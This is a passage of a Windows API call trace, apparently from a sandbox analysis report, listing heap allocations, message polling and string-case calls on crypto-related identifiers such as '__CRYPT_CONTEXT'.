| out: lpMsg=0x8ceee0) returned 0 [0183.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0183.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0183.938] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0183.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0183.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fce0 [0183.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0183.938] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0183.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fce0 | out: hHeap=0x970000) returned 1 [0183.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0183.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50890 [0183.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0183.938] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0183.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0183.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0183.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0183.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0183.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0183.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0183.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0183.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0183.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0183.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0183.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0183.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0183.939] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0183.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0183.939] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0183.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0183.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0183.939] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0183.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0183.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0183.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0183.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0183.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0183.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0183.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0183.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0183.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0183.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0183.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0183.939] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0183.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0183.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0183.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0183.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0183.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0183.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0183.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0183.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0183.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0183.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0183.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0183.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0183.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0183.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0183.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0183.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0183.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0183.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0183.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0183.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0183.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0183.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0183.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0183.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0183.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0183.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0183.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0183.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0183.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0183.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0183.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0183.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0183.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0183.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0183.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0183.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0183.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0183.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0183.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0183.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0183.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0183.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0183.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0183.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0183.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0183.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0183.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0183.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0183.941] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0183.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0183.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0183.941] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0183.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0183.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0183.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0183.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0183.942] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0183.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0183.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0183.942] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0183.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0183.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0183.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50608 [0183.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0183.942] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0183.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0183.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0183.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0183.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0183.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0183.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0183.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0183.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0183.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0183.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0183.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0183.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50680 [0183.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e503f8 [0183.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50698 [0183.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0183.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0183.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50530 [0183.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509b0 [0183.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0183.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0183.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0183.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0183.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0183.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0183.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0183.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0183.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0183.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0183.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0183.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0183.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0183.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0183.943] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0183.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0183.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0183.944] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0183.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0183.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fea0 [0183.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0183.944] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0183.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fea0 | out: hHeap=0x970000) returned 1 [0183.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0183.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0183.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0183.944] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0183.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0183.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0183.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0183.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0183.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0183.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0183.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0183.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0183.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0183.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0183.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0183.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0183.945] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0183.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0183.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0183.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0183.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff80 [0183.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0183.945] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0183.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff80 | out: hHeap=0x970000) returned 1 [0183.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0183.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50530 [0183.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0183.945] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0183.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0183.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0183.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0183.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0183.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0183.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0183.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0183.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0183.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0183.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0183.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0183.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0183.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0183.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0183.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0183.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0183.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0183.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0183.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0183.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0183.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0183.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0183.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0183.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0183.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0183.947] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0183.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0183.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0183.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50830 [0183.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0183.947] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0183.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0183.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0183.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0183.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0183.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0183.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0183.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0183.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0183.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0183.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0183.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0183.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0183.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0183.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0183.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0183.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0183.948] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0183.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0183.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0183.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0183.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0183.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0183.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0183.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0183.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0183.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0183.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0183.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0183.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0183.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 